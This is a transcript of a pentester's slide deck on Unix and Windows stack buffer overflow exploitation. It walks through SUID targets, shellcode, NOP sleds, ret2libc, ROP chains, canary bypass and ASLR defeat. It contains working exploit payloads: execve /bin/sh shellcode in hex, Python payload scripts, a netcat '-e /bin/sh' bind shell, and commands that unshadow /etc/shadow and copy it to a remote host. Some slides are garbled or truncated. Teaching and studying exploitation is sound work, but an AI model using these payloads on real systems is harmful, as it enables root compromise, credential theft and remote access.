unix executable buffer overflow

148
UNIX EXECUTABLE EXPLOITATION Ammarit Thongthua <ShellCodeNoobx Es>

Upload: ammarit

Post on 14-Jul-2015

1.582 views

Category:

Technology


5 download

TRANSCRIPT

Page 1: Unix executable buffer overflow

UNIX EXECUTABLE EXPLOITATION

Ammarit Thongthua

<ShellCodeNoobx Es>

Page 2: Unix executable buffer overflow

#whoami

<Name>

Ammarit Thongthua

Mr. K

ShellCodeNoob

</Name>

<Profile>

Pentest Team leader in private company

</Profile>

FB : Ammarit Es Shellcodenoob

Page 3: Unix executable buffer overflow

“There are some relationships between

- Reverse Engineering

- Buffer overflow

- Shellcode They are the complement of each other”

“Sleepy Kama”

#Inspiration

Page 6: Unix executable buffer overflow

AGENDA

Introduction Vulnerable Unix executable

Memory Space and Stack Layout

Buffer Overflow

Unix application Basic Reverse Engineer

ShellCode

Protection vs Expliotation Basic Stack without protection

Bypass password protection Exploit to get root privilege

Limited Stack Space

StackGuard (Canary)

Non-Executable-Stack (NX)

ROP Chain

Address Space Layout Randomization (ASLR) Defeat with static system library (kernel < 2.6.20 )

ASLR with removed Static system library Defeat with application wrapping (kernel >= 2.6.20 )

Compare with windows exploitation

Page 7: Unix executable buffer overflow

Chapter I

“Vulnerable Unix Application”

Page 8: Unix executable buffer overflow

VULNERABLE UNIX APPLICATION

Has permission “root” as user or group

SUID or SGID is set (Sting S at eXecute bit)

This 2 criteria provided privilege escalation to be root

list="$(find / -perm -4000 -o -perm -2000)";for i in

$list; do ls -al $i; done

ls –R / | grep “wsr” | grep “root”

Page 9: Unix executable buffer overflow

VULNERABLE UNIX APPLICATION

Page 10: Unix executable buffer overflow

VULNERABLE UNIX APPLICATION

Use vulnerable input standard function

Ex: strcp(), gets(), sprintf (), vsprintf ()

They make the program can possibly segmentation

fault or buffer overflow

Page 11: Unix executable buffer overflow

Chapter II

“Memory Address and Stack Layout”

Page 12: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

Heap

Stack

Page 13: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

Heap

Stack

Page 14: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

Heap

Stack

Page 15: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

main ()

{

int i = 0;

checkpw (); }

char pw[608];

Page 16: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Stack

Int i = 0;

…..

Previous Stacks

Main()

ESP

Page 17: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

main ()

{

int I = 0;

checkpw (); }

char pw[608];

Page 18: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

main ()

{

int I = 0;

checkpw (); }

char pw[608];

RP

Page 19: Unix executable buffer overflow

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Char pw[608];

Int i = 0;

…..

Previous Stacks

Main()

checkpw() SFP

RP

Stack

ESP

Page 20: Unix executable buffer overflow

Chapter III

“Stack buffer overflow”

Page 21: Unix executable buffer overflow

BUFFER OVERFLOW

The situation when the data that input to the

system is larger than the size of buffer that

declare to be used

AAAAAAAAAA....[607 of A]….AAA\x00 SFP RP

AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAA\x00

SFP = 0x41414141

***RP = 0x41414141

“Segmentation fault” “Illegal Instruction”

SFP RP

Ex: char pw[608];

Page 22: Unix executable buffer overflow

“How can we detect

buffer overflow in unix application?”

Page 23: Unix executable buffer overflow

“Generally, we use manually test”

Page 24: Unix executable buffer overflow

BUFFER OVERFLOW

Page 25: Unix executable buffer overflow

“Better way, we use pattern test”

Page 26: Unix executable buffer overflow

BUFFER OVERFLOW

/usr/share/metasploit-framework/tools/pattern_create.rb 1000

Check buffer overflow position

Page 27: Unix executable buffer overflow

BUFFER OVERFLOW

Page 28: Unix executable buffer overflow

Check buffer overflow position

/usr/share/metasploit-framework/tools/pattern_offset.rb 41347541

BUFFER OVERFLOW

Page 29: Unix executable buffer overflow

“What happen

if we can over write Return Pointer?”

“Can we control flow of instruction?”

Page 30: Unix executable buffer overflow

“Yes”

Page 31: Unix executable buffer overflow

BUFFER OVERFLOW

AAAAAAAAAAAAA….[612 of A]….AAAAAAA

SFP = 0x41414141

***RP = 0x080484c7

“Segmentation fault” “Illegal Instruction”

SFP RP

0x080484c7

Page 32: Unix executable buffer overflow

BUFFER OVERFLOW

Page 33: Unix executable buffer overflow

BUFFER OVERFLOW

Demo #1

GDB and Bypass password

protection

Page 34: Unix executable buffer overflow

Chapter IV

“Basic Shellcode”

Page 35: Unix executable buffer overflow

“Imagine if we can control Return Pointer to

our own Instruction”

“So, we can control the whole system”

Page 36: Unix executable buffer overflow

SHELL CODE

[Malicious Machine OpCode] + AAAAAAAAAAAAAAA

SFP = 0x41414141

***RP = 0xFBFF0544

0xF

BF

F0544

0xFBFF0544

SFP RP

Attacker can control return pointer to run Malicious Machine OpCode that put to memory (Shell Code).

Insert shell code as a part of input to reduce the complexity of exploitation

Page 37: Unix executable buffer overflow

SHELL CODE

Shell code is the code that attacker want the

system run in order to operate the command as

attacker need (create form assembly and convert

to OpCode

Ex;

Open port for connection to that system with root privilege

Add user to the system

Run shell as root privilege

Shell code is written as Hexadecimal format

Page 38: Unix executable buffer overflow

“What happen if we can make Return Pointer

system_call /bin/sh

by program run as root ?”

Page 39: Unix executable buffer overflow

“We will get shell prompt with root pri.”

Page 40: Unix executable buffer overflow

SHELL CODE

31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 53 89 E1 B0 0B CD 80

Assembly Code Op Code

Shell Code

: system_call (/bin/sh)

/bin

0000

//sh

0000

$esp

Page 41: Unix executable buffer overflow

SHELL CODE

System_call(/bin/sh) Run as “root”

Vulnerability program

We get /bin/sh as root

RP

Page 42: Unix executable buffer overflow

“How can we get shellcode ?”

Page 43: Unix executable buffer overflow

Where can we get shell code use to make exploit. ?

Create your own shell code (quite take time)

Use Metasploit to generate shell code

Metepreter

Search from internet

shell-storm.org/shellcode

packetstormsecurity.com

www.exploit-db.com/exploits

SHELL CODE

Page 44: Unix executable buffer overflow

“How can we manually create shellcode ?”

Page 45: Unix executable buffer overflow

“Good news, you need to understand

Assemble first !!”

Page 46: Unix executable buffer overflow

https://defuse.ca/online-x86-assembler.htm#disassembly

SHELL CODE

Page 47: Unix executable buffer overflow

SHELL CODE

Page 48: Unix executable buffer overflow

“How can we know what is shellcode do ?”

Page 49: Unix executable buffer overflow

“Good news again, you need to understand

Assemble first !!”

Page 50: Unix executable buffer overflow

http://www2.onlinedisassembler.com/odaweb/

SHELL CODE

Page 51: Unix executable buffer overflow

“Can you see something difference between

Assembly from debugger and output from

the webs?”

Page 52: Unix executable buffer overflow

ASSEMBLY CODE

From our debugger From our web disassembly

Page 53: Unix executable buffer overflow

What’s wrong ?

Page 54: Unix executable buffer overflow

Nothing wrong..

It’s just different instruction set

Page 55: Unix executable buffer overflow

ASSEMBLY CODE

From our debugger From our web disassembly

AT&T base instruction Intel base instruction

Page 56: Unix executable buffer overflow

Chapter V

“Make exploit payload”

Page 57: Unix executable buffer overflow

EXPLOIT PAYLOAD

[Shell Code] + [PADDING make size to 612 ]

SFP = 0x41414141

***RP = 0xBFFF528

0xB

FF

F528

SFP RP

Payload = Shellcode + PAD + RP

612 bytes 4 bytes

0xBFFF528

Example:

Page 58: Unix executable buffer overflow

Where is the shell code start location (For this

example case)?

Need to reverse engineering and debug

EXPLOIT PAYLOAD

Page 59: Unix executable buffer overflow

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x20\xf5\xff\xbf” #0xBFFF520 (Little Endean!!!) PAYLOAD = scode + “A”*528 + RP print PAYLOAD ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

EXPLOIT PAYLOAD

Page 60: Unix executable buffer overflow

“Let’s try our payload”

Page 61: Unix executable buffer overflow

EXPLOIT PAYLOAD

Sometime result of our exploit is crash !!!

Page 62: Unix executable buffer overflow

“What’s wrong in our PAYLOAD ^^? ”

Page 63: Unix executable buffer overflow

EXPLOIT PAYLOAD

Memory on address when debug and run exploit

payload may a bit shift

[Shell Code] + [PADDING make size to 612 ] 0xBFFF528

Page 64: Unix executable buffer overflow

“How can we solve this problem ?”

Page 65: Unix executable buffer overflow

[ Shell Code ] + [ 577 Byte of PADDING ] 0xBFFF528

EXPLOIT PAYLOAD

[400B. Landing space] +[Shell Code] + [177 B. PADDING ] 0xBFFF540

NOP (\x90) = Do nothing

Page 66: Unix executable buffer overflow

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x58\xf5\xff\xbf” # 0xBFFF558 Exp = “\x90”*400 + scode + “A”*128 + RP ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

EXPLOIT PAYLOAD

Page 67: Unix executable buffer overflow

“Let’s try our improved payload”

Page 68: Unix executable buffer overflow

EXPLOIT CODE

When exploit successfully

Page 69: Unix executable buffer overflow

EXPLOIT CODE

Demo #2

Exploit to get root privilege

Page 70: Unix executable buffer overflow

Chapter VI

“Buffer overflow in limited stack space”

Page 71: Unix executable buffer overflow

LIMITED STACK SPACE

\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\

SFP = 0x12237657

***RP = 0x4a6ef36f

SFP RP

Payload =\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\

“Segmentation fault” “Illegal Instruction”

Page 72: Unix executable buffer overflow

“How can we solve this problem”

Page 73: Unix executable buffer overflow

LIMITED STACK SPACE

[ NOP Space (NOP Sledding) ] + [S h e l l C o d e ]

AAAAAAAAAAAAA…[612 of A]…AAAAAAAA

SFP = 0x41414141

***RP = 0xBFFFxxxx ??? (We don’t know yet)

0xF

BF

Fxxxx

0xFBFFxxxx

SFP RP

If size of buffer is limited, we need to put some

shell code some where in stack and control RP to

run shell code

Page 74: Unix executable buffer overflow

LIMITED STACK SPACE

***RP = 0xBFFFF7B0

Page 75: Unix executable buffer overflow

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\xb0\xf7\xff\xbf” # 0xBFFF520 Exp =`python c- ‘print “A”*612` + RP + =`python c- ‘print “\x90”*400` + scode

----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

LIMITED STACK SPACE

Page 76: Unix executable buffer overflow

When exploit successfully

LIMITED STACK SPACE

Page 77: Unix executable buffer overflow

Demo #3

Exploit to get root privilege

With Limited Stack Space

LIMITED STACK SPACE

Page 78: Unix executable buffer overflow

SUMMARY

Grant() main() AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP

\x90 \x90\x90\x90\x90\x90\x90 + [Shell Code] AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA

Bypass password protection

Buffer overflow to run shellcode to get root privilege

Buffer overflow to run shellcode with limited Stack Space

Page 79: Unix executable buffer overflow

“Is it easy like this in real life?”

Page 80: Unix executable buffer overflow

“No..”

Page 81: Unix executable buffer overflow

Chapter VII

“Ret-2-libc”

Page 82: Unix executable buffer overflow

“What is Ret-2-libc ?”

Page 83: Unix executable buffer overflow

Characteristic of vulnerable program

Has set SUID, GUID

Can Overflow

Use Libc.

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 84: Unix executable buffer overflow

“What happen if we jump RP and run?”

system_call nc –l –p 9999 –e /bin/sh

Page 85: Unix executable buffer overflow

Fool program to make system call with evil

command

System_call nc -l -p 9999 -e /bin/sh

AAAAAAAAAAAAA

If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root” So, “nc –l –p 9999 –e /bin/sh” run as “root”

SFP

RP Arg system

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 86: Unix executable buffer overflow

Find location of “system” call function

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 87: Unix executable buffer overflow

Create “evil” Argument as system global variable

AAAAAAAAAAAAA

SFP RP =

Arg system

\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 88: Unix executable buffer overflow

Result

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 89: Unix executable buffer overflow

When exploit successfully

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 90: Unix executable buffer overflow

Demo #4

Exploit to get root privilege

with Ret-2-libc style

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

Page 91: Unix executable buffer overflow

Chapter VIII

“ROP Chaining”

Page 92: Unix executable buffer overflow

The limitation of Ret-2-Libc is run only 1 command a time to exploit

AAAAAAAAAAAAA

SFP RP =

Arg system

\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =

ROP CHAIN

Page 93: Unix executable buffer overflow

“It’s better if we can run more than one

command in one exploit”

Page 94: Unix executable buffer overflow

“Let improve Ret-2-Libc to ROP Chaining”

Page 95: Unix executable buffer overflow

AAAAAAAAAAAAA

SFP RP =

Arg1 system

\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =

ROP CHAIN

RP

Page 96: Unix executable buffer overflow

AAAAAAAAAAAAA Arg1 system

ROP CHAIN

RP

Page 97: Unix executable buffer overflow

Arg1 system

ROP CHAIN

RP

Page 98: Unix executable buffer overflow

Arg1 system

ROP CHAIN

RP

Page 99: Unix executable buffer overflow

Arg1 system

ROP CHAIN

RP Arg2 system

Page 100: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 RP

Page 101: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 RP

Page 102: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 RP system Arg3 RP

Page 103: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 RP system Arg3 RP

Page 104: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 system Arg3

Argn-2 system system Argn-1 system Argn

Page 105: Unix executable buffer overflow

export ARG1=“unshadow /etc/passwd /etc/shadow > /output.txt”

export ARG2=“scp [email protected]:output.txt /home/haker”

.

.

.

.

export ARGn=“nc –l –p 4444 –e /bin/sh”

ROP CHAIN

Page 106: Unix executable buffer overflow

“How can we chain them ?”

Page 107: Unix executable buffer overflow

“We need POP POP RET”

ROP Gadget

Page 108: Unix executable buffer overflow

Arg1 system

ROP CHAIN

RP Arg2 system

POP

POP

RET

Page 109: Unix executable buffer overflow

ROP CHAIN

POP POP RET

Arg1 system RP Arg2 system

Page 110: Unix executable buffer overflow

ROP CHAIN

Page 111: Unix executable buffer overflow

ROP CHAIN

POP

POP

RET

\xc5\x85\x48\x80

Arg1 system RP Arg2 system

Page 112: Unix executable buffer overflow

ROP CHAIN

Arg1 system system Arg2 system Arg3

Argn-2 system system Argn-1 system Argn

RP = \xc5\x85\x48\x80 (POP|POP|RET)

RP RP RP

RP RP

Page 113: Unix executable buffer overflow

ROP CHAIN

python -c 'print "A"*12 +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg1]" + "PADS" +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg2]“ + "PADS" +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg3]“ + "PADS" +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg4]“ + "PADS" +

.

.

. "\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.argN]“ + "PADS" +

Page 114: Unix executable buffer overflow

Chapter IIX

“Stack Guard (Canary)”

Cookie of death

Page 115: Unix executable buffer overflow

STACK GUARD (CANARY)

Protection mechanism place in stack (8 byte) to detect the overflow and preventing to control RP

Need to include when we compile program

gcc -fstack-protector code.c -o myprogram

If canary overwritten the program will be terminated

Type of Canary

NULL canary (0x00000000)

Terminator canary (0x00000aff – 0x000aff0d)

Random canary (Unpredicted 4 byte)

AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA

SFP RP Canary

Page 116: Unix executable buffer overflow

For Null canary and Terminator canary can be

defeated by “Canary repaired”

NULL canary only app use gets() function

AAA…AAA00000000AAAA[RP] x90\x90\x90\x[Shellcode]\x0a

Terminator canary (always 0x00000aff)

app use gets() function

app use strcpy() function and need more than 1 arg

AAA…AAAAAAA0affAAAA[RP] x90\x90\x90\x[Shellcode]00

BBB…BBBBB00

CCC…CCC00

AAA…AAA00000affAAAA[RP] x90\x90\x90\x[Shellcode]

STACK GUARD (CANARY) DEFEAT

Arg1=

Arg2=

Arg3=

Page 117: Unix executable buffer overflow

STACK GUARD (CANARY) DEFEAT EXAMPLE

Find opportunity to exploit

Page 118: Unix executable buffer overflow

STACK GUARD (CANARY) DEFEAT EXAMPLE

Find opportunity to exploit

Canary value = 0x00000aff (It is a terminator canary ^_^)

Page 119: Unix executable buffer overflow

STACK GUARD (CANARY) DEFEAT EXAMPLE

Run exploit

Page 120: Unix executable buffer overflow

Demo #5

Exploit to get root privilege

with canary repaired

STACK GUARD (CANARY) DEFEAT

Page 121: Unix executable buffer overflow

Chapter IX

“ASLR”

Page 122: Unix executable buffer overflow

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)

Technique use prevent an attacker jumping to a

particular exploited code in memory by random

the virtual address in every runtime.

Page 123: Unix executable buffer overflow

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP …….

Random is 2 So, Possibility =1/2 or 0.000001 20 20

How can we increase possibility to jump to shell code ?

Page 124: Unix executable buffer overflow

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ] …….

JMP ESP

esp

If OS kernel has some static lib kernel < 2.6.20.

Use JMP ESP (Trampoline) instruction in that

static lib to bring RP to shell code

INC EAX ADD EBS, EBP ….

Page 125: Unix executable buffer overflow

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

If OS kernel has not static lib (kernel >= 2.6.20 ), need to write application to call vulnerable application to limit random address space (App wrap up)

AAAAAAAAAAAAAAAAAAAAAAAAA

RP /x90/x90/x90/x90/x90/x90/x90/x90

/x90/x90/x90/x90/x90/x90/x90/x90/x90 /x90/x90/x90/x90/x[ shell code ]

Check current ESP value

and Set RP = ESP + [vul app buffer]

Page 126: Unix executable buffer overflow

Wrap up app

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

Page 127: Unix executable buffer overflow

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

Result

Page 128: Unix executable buffer overflow

Chapter X

“Compare Windows & unix exploit”

Page 129: Unix executable buffer overflow

DIFFERENCE OF UNIX AND WINDOWS APPLICATION EXPLOIT

Unix application directly communicate to kernel

Window application must communicate through

Window API (Not directly communicate to kernel) . It’s make more difficult to exploit

App Kernel

App Kernel API

Page 130: Unix executable buffer overflow

WINDOW SHELLCODE

Static Shellcode (Example for window XP)

Static or fix memory address of windows API that use

in exploit code (Specific OS version and SP)

Find address of WinExec() > use to execute cmd / app

Find address of ExitProcess() > use to clear register

Portable Shellcode

Dynamically find memory address of need window

API by using 2 useful windows API

LoadLibraryA() to get Hmodule (DLL's base address )

GetProcessAddress() to get real address of function

Get address of WinExec()

Get address of ExitProcess()

Page 132: Unix executable buffer overflow

WINDOW SHELLCODE

Static Shellcode (Example for window XP)

Page 133: Unix executable buffer overflow

WINDOW SHELLCODE

Static Shellcode (Example for window XP)

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

Page 134: Unix executable buffer overflow

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 135: Unix executable buffer overflow

Found the vulnerability of application

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 136: Unix executable buffer overflow

Input to the system is larger than the size of

buffer that declare to be used

AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP

char local[49];

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP

ESP

Page 137: Unix executable buffer overflow

Find address to jump to exploit code

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

\x90\x90\x90\x90…[shellcode]…AAAAAAAA RP

* RP = “\x40\xff\x13

Page 138: Unix executable buffer overflow

Exploit Successful

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Successfully exploit.

But calc.exe run as

your permission not “Administrator”

Page 139: Unix executable buffer overflow

Imagine, if some windows application provide

network service like FTP that start by

“SYSTEM” account and have buffer overflow vulnerability (Ex: WarFTP app)

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 140: Unix executable buffer overflow

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 141: Unix executable buffer overflow

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 142: Unix executable buffer overflow

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

FTP 192.168.1.2

USER AAAAAA….AAAA $JMP_ESP \x90\x90\x90\x90 SYSCODE

RP

ESP

Page 143: Unix executable buffer overflow

After connect back to open port, user/password

to the system to confirm that we successfully get system privilege

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Page 144: Unix executable buffer overflow

Rule of permission gaining in Windows exploit

If we exploit the application, we will get the

permission as who start or run the application

If application or service start or run by

“Administrator” or “SYSTEM” account, we will gain

“Administrator” or “SYSTEM” privilege

All windows vulnerability that attacker use to

compromise OS occurred form successfully exploit

“SYSTEM” service

BASIC WINDOWS EXPLOITATION

Page 145: Unix executable buffer overflow

DLL injection exploitation

SafeSeh (Structured Exception Handling) and Abuse

Windows ASLR and how to defeat

Windows DEP and how to defeat

GS protection in Windows application and how to defeat

Advance pivoting attack technique

HEAP overflow / Heap Spray / Use After free

“Unfortunately, We have not enough time to walk through”

MORE INTERESTING TOPIC FOR WINDOWS

Page 146: Unix executable buffer overflow

CoreLAN team : https://www.corelan.be

NetSEC : http://netsec.ws/?p=180

http://www.cis.syr.edu/~wedu/education/buffer_overflow.html

LEARNING SITE

Page 147: Unix executable buffer overflow

REFERENCE

SANS 660 Advanced Penetration Testing, Exploit Writing, and Ethical Hacking

GIAC GXPN : Exploit Researcher and Advanced Penetration Tester

Protecting Against Address Space Layou Randomization (ASLR) Compromises and Return-to-Libc Attacks Using Network Intrusion Detection Systems. David J. Day, Zheng-Xu Zhao, November 2011, Volume 8, Issue 4, pp 472-483

Cowan, C. Buffer Overflow Attacks. StackGuard:Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. 1 October 2008.

Defeating PaX ASLR protection. Durden, T. 59, s.l. :Phrack, 2002, Vol. 12.

Page 148: Unix executable buffer overflow